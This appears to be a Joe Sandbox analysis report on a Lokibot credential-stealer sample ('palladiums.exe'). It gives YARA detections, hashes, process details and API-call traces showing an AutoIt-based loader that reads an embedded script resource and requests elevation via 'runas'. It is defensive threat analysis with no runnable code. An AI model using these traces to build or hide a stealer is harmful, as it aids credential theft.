Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	05:02:32
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	05:02:33
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	1.1%
Signature Coverage:	3.6%
Total number of Nodes:	1603
Total number of Limit Nodes:	30

Executed Functions

Function 007142DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0071430D

Part of subcall function 00716B57: _wcslen.LIBCMT ref: 00716B6A

GetCurrentProcess.KERNEL32(?,007ACB64,00000000,?,?), ref: 00714422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00714429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00714454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00714466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00714474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0071447B
GetSystemInfo.KERNEL32(?,?,?), ref: 007144A0

Strings

kernel32.dll, xrefs: 0071444F
|O, xrefs: 007536F8
GetNativeSystemInfo, xrefs: 00714460

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 8422e3c819b3fd66c7ef82bb10765c8cc169e645bb6c45aca133f72cb36812a9
Instruction ID: 61a728e487382d2ffd26c9a8a2a6302f791fd2cd0d411c066b4e7bd40995fff8
Opcode Fuzzy Hash: 8422e3c819b3fd66c7ef82bb10765c8cc169e645bb6c45aca133f72cb36812a9
Instruction Fuzzy Hash: C2A1B57190B2C0DFC712C76DBCC35D97FA46B2E741B98C899D8419BA62D27C4948CB39

Function 007142A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,007150AA,?,?,00000000,00000000), ref: 007142B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007150AA,?,?,00000000,00000000), ref: 007142C9
LoadResource.KERNEL32(?,00000000,?,?,007150AA,?,?,00000000,00000000,?,?,?,?,?,?,00714F20), ref: 007535BE
SizeofResource.KERNEL32(?,00000000,?,?,007150AA,?,?,00000000,00000000,?,?,?,?,?,?,00714F20), ref: 007535D3
LockResource.KERNEL32(007150AA,?,?,007150AA,?,?,00000000,00000000,?,?,?,?,?,?,00714F20,?), ref: 007535E6

Strings

SCRIPT, xrefs: 007142BF

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 6326701dea7b611c3745878353fef1de12f9c6246b7a54cb7ee9eadea9309db9
Instruction ID: 078e415e3dcdb5a2318902a1cf8b8e1b4e08edb23d86cefa097389b90d852af8
Opcode Fuzzy Hash: 6326701dea7b611c3745878353fef1de12f9c6246b7a54cb7ee9eadea9309db9
Instruction Fuzzy Hash: 76118E71200700BFDB268B69DC49F677BBAFBC6B51F108169F402D62A0DB75DC409A30

Function 00752BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00712B6B

Part of subcall function 00713A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007E1418,?,00712E7F,?,?,?,00000000), ref: 00713A78

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,007D2224), ref: 00752C10
ShellExecuteW.SHELL32(00000000,?,?,007D2224), ref: 00752C17

Strings

runas, xrefs: 00752C0B

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: a8ad35f73ee962baebf39cfdf69f1008b98271ae96176b1fba34c4bd6a9c6dd2
Instruction ID: fdd33ec09103c1c2364a8ce8d37effc187918350f2a1411c69899f80e1b0251e
Opcode Fuzzy Hash: a8ad35f73ee962baebf39cfdf69f1008b98271ae96176b1fba34c4bd6a9c6dd2
Instruction Fuzzy Hash: 8C11D571208381EAC715FF68D85A9EDB7A49B96350F44442DB182061E3DF3C9A8B8712

Function 0071D730 Relevance: 21.6, APIs: 14, Instructions: 631sleepsynchronizationtimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0071D807
timeGetTime.WINMM ref: 0071DA07
Sleep.KERNEL32(0000000A), ref: 0071DBB1
Sleep.KERNEL32(0000000A), ref: 00762B76
GetExitCodeProcess.KERNEL32(?,?), ref: 00762C11
WaitForSingleObject.KERNEL32(?,00000000), ref: 00762C29
CloseHandle.KERNEL32(?), ref: 00762C3D
Sleep.KERNEL32(?,CCCCCCCC,00000000), ref: 00762CA9

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Sleep$CloseCodeExitHandleInputObjectProcessSingleStateTimeWaittime
String ID:
API String ID: 388478766-0
Opcode ID: 18920c330bdde8dee3e445c7206422d30d6bcc761d13a976cc78621ed172570a
Instruction ID: f82fb1cb92721b5671b42632a80fcc0d51ac00dfe5b886877876f40a349a80b4
Opcode Fuzzy Hash: 18920c330bdde8dee3e445c7206422d30d6bcc761d13a976cc78621ed172570a
Instruction Fuzzy Hash: 0442D070608641EFD735CF28C888BAAB7A0BF85314F548519E8568B2D2D77CEC85CF92

Function 00712CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00712D07
RegisterClassExW.USER32(00000030), ref: 00712D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00712D42
InitCommonControlsEx.COMCTL32(?), ref: 00712D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00712D6F
LoadIconW.USER32(000000A9), ref: 00712D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00712D94

Strings

0, xrefs: 00712CE9
TaskbarCreated, xrefs: 00712D37
AutoIt v3 GUI, xrefs: 00712D23
+, xrefs: 00712CF0

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: dfe6825f45f290bb68e5d778acd7217887d9ccbd652295985936790c9ed2f015
Instruction ID: e1fe3b45651527b76380ed27353a5991d1fc725b37eff30921cbe47250dbdb5f
Opcode Fuzzy Hash: dfe6825f45f290bb68e5d778acd7217887d9ccbd652295985936790c9ed2f015
Instruction Fuzzy Hash: 9221F9B1902398EFDB01DF94EC89BDD7BB4FB49704F40811AF511AA290D7B95540CF58

Function 0075065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0075039A: CreateFileW.KERNELBASE(00000000,00000000,?,00750704,?,?,00000000,?,00750704,00000000,0000000C), ref: 007503B7

GetLastError.KERNEL32 ref: 0075076F
__dosmaperr.LIBCMT ref: 00750776
GetFileType.KERNELBASE(00000000), ref: 00750782
GetLastError.KERNEL32 ref: 0075078C
__dosmaperr.LIBCMT ref: 00750795
CloseHandle.KERNEL32(00000000), ref: 007507B5
CloseHandle.KERNEL32(?), ref: 007508FF
GetLastError.KERNEL32 ref: 00750931
__dosmaperr.LIBCMT ref: 00750938

Strings

H, xrefs: 007508BD

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 9c19d918f0722275fba9651391daa993402c04553b8ed26138bf1fce2925649d
Instruction ID: 2756dfd9e64cdc3823c23120e3f72f3330ee844166fcfcb294bb197b23a930b7
Opcode Fuzzy Hash: 9c19d918f0722275fba9651391daa993402c04553b8ed26138bf1fce2925649d
Instruction Fuzzy Hash: E4A12532A001449FDF19AF68D895BEE3BA0EB4A321F14415DFC11DF292DB799816CBD1

Function 0071344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00713A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007E1418,?,00712E7F,?,?,?,00000000), ref: 00713A78

Part of subcall function 00713357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00713379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0071356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0075318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007531CE
RegCloseKey.ADVAPI32(?), ref: 00753210
_wcslen.LIBCMT ref: 00753277
_wcslen.LIBCMT ref: 00753286

Strings

\Include\, xrefs: 00713527
\, xrefs: 0075328C
Software\AutoIt v3\AutoIt, xrefs: 00713560
Include, xrefs: 00753184, 007531C5

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 5080758a949c1714145d2958122d72d8d5b12f051fb161eca2a54610a645210e
Instruction ID: 641b74626531812f7e281e842b2567130f5a6fa06b5443884013a9f87e0bde13
Opcode Fuzzy Hash: 5080758a949c1714145d2958122d72d8d5b12f051fb161eca2a54610a645210e
Instruction Fuzzy Hash: CD718D71405340AEC314DF29DC869ABBBE8FF89740F40452EF545871A2EB7C9A8ACF65

Function 00712B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00712B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00712B9D
LoadIconW.USER32(00000063), ref: 00712BB3
LoadIconW.USER32(000000A4), ref: 00712BC5
LoadIconW.USER32(000000A2), ref: 00712BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00712BEF
RegisterClassExW.USER32(?), ref: 00712C40

Part of subcall function 00712CD4: GetSysColorBrush.USER32(0000000F), ref: 00712D07
Part of subcall function 00712CD4: RegisterClassExW.USER32(00000030), ref: 00712D31
Part of subcall function 00712CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00712D42
Part of subcall function 00712CD4: InitCommonControlsEx.COMCTL32(?), ref: 00712D5F
Part of subcall function 00712CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00712D6F
Part of subcall function 00712CD4: LoadIconW.USER32(000000A9), ref: 00712D85
Part of subcall function 00712CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00712D94

Strings

AutoIt v3, xrefs: 00712C2F
#, xrefs: 00712C16
0, xrefs: 00712C0F

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 07bd633a6ddb6652be54ba343b786d814a85e4eaac00e7df9244790d5e58f00f
Instruction ID: 4982dca1d4aa2946c6a60bc830685cc4544640f3969abe2ee9725dc15f8a5a3d
Opcode Fuzzy Hash: 07bd633a6ddb6652be54ba343b786d814a85e4eaac00e7df9244790d5e58f00f
Instruction Fuzzy Hash: F2213D70E02358AFDB119F95EC96A9D7FB4FB4CB50F40801AE500EA7A0D7B91540CF98

Function 0071B710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0071BB4E

Strings

x#~, xrefs: 00760207
p#~, xrefs: 00760263
p%~, xrefs: 0071BB32
p#~, xrefs: 0076024F
x#~, xrefs: 00760168
p%~, xrefs: 0071B8DC
p#~, xrefs: 0071BA72
p#~, xrefs: 0071BB6B

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Init_thread_footer
String ID: p#~$p#~$p#~$p#~$p%~$p%~$x#~$x#~
API String ID: 1385522511-3993589769
Opcode ID: 0a107db5837bd8f23c46acd359f50b09785c35351754ca004c3552cef5171fdf
Instruction ID: 89e136bec427604818833f11869aa4db7558e2c6158dfdc5454cde948fa105fc
Opcode Fuzzy Hash: 0a107db5837bd8f23c46acd359f50b09785c35351754ca004c3552cef5171fdf
Instruction Fuzzy Hash: 9A329074A04209DFDB24CF58C894ABEB7B9EF48314F148059ED06AB291D77CED82CB91

Function 00713170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0071316A,?,?), ref: 007131D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0071316A,?,?), ref: 00713204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00713227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0071316A,?,?), ref: 00713232
CreatePopupMenu.USER32 ref: 00713246
PostQuitMessage.USER32(00000000), ref: 00713267

Strings

TaskbarCreated, xrefs: 0071322D

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: b4be320d5adc2527b7a8e269a74008760d407987c8a9898ead6ec6f63bec1f27
Instruction ID: d7498f32f24b11cbad3cbb81253b2ba8205f76f692222e2ce03392ead23fc2e5
Opcode Fuzzy Hash: b4be320d5adc2527b7a8e269a74008760d407987c8a9898ead6ec6f63bec1f27
Instruction Fuzzy Hash: B9414731300288BBDB156B7C9C4EBFD3A29F74A340F448125F9029A1E2CB7DDAC197A5

Function 0071DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D%~, xrefs: 0071E4B1
D%~D%~, xrefs: 0071E27E
D%~, xrefs: 0076302D
Variable must be of type 'Object'., xrefs: 007632B7
D%~, xrefs: 00762FDA
D%~, xrefs: 0071E1E0

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID: D%~$D%~$D%~$D%~$D%~D%~$Variable must be of type 'Object'.
API String ID: 0-420399204
Opcode ID: 8103e914faa7ddbd8c36737a4c7fcced7c7e4f75892f2d487e8ec9f964e56511
Instruction ID: 94363d80158af7caf441515a0b8c4c1a1b1c2a9919407c6a54c4d09885264466
Opcode Fuzzy Hash: 8103e914faa7ddbd8c36737a4c7fcced7c7e4f75892f2d487e8ec9f964e56511
Instruction Fuzzy Hash: 40C28A71E00215CFCB24CF58C894AADB7B1BF19310F248569ED56AB392D379ED82CB91

Function 01320118 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0132015D

Memory Dump Source

Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: e4c67031042b6461a37d3d92c8cb92528aee4ac75af376cbd5aaecaec0f029d4
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: 4C511A75A50209FBEF24EFA4CC49FDE7778AF48704F108514F60AEB180DA74A644CB60

Function 00712C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00712C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00712CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00711CAD,?), ref: 00712CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00711CAD,?), ref: 00712CCF

Strings

AutoIt v3, xrefs: 00712C89, 00712C8E, 00712C8F
edit, xrefs: 00712CAC

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: a3b949660ac9a5c9714c627a93af04e0220dc3501074f5bc28d72a468e7fb54c
Instruction ID: dfd36fd927c4f82ca94494c4970cb2751ac708fe6d468624cc0fad9be2f9d430
Opcode Fuzzy Hash: a3b949660ac9a5c9714c627a93af04e0220dc3501074f5bc28d72a468e7fb54c
Instruction Fuzzy Hash: F1F0DA755412D07AEB311717AC8AE772EBDD7CBF50B80805AF900AA9A0C6791851DAB8

Function 01321BE8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01321AD8: Sleep.KERNELBASE(000001F4), ref: 01321AE9

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01321D24

Strings

OKYXKFXGW9FGTCO9BN0IUGG67, xrefs: 01321DA4, 01321DA7

Memory Dump Source

Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd

Similarity

API ID: CreateFileSleep
String ID: OKYXKFXGW9FGTCO9BN0IUGG67
API String ID: 2694422964-1701341331
Opcode ID: e27014f07645df3320b1c3d49663a68e9be9656beef294eba7d1ce77b6a0dbe5
Instruction ID: af5e191a76f89be484def392a65b67e52ca6fec551302ec6690177556b223d3c
Opcode Fuzzy Hash: e27014f07645df3320b1c3d49663a68e9be9656beef294eba7d1ce77b6a0dbe5
Instruction Fuzzy Hash: 10619570D04298DBEF11E7B8C954BEEBBB89F15304F044198E2487B2C1D7B90B49CB65

Function 00713B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

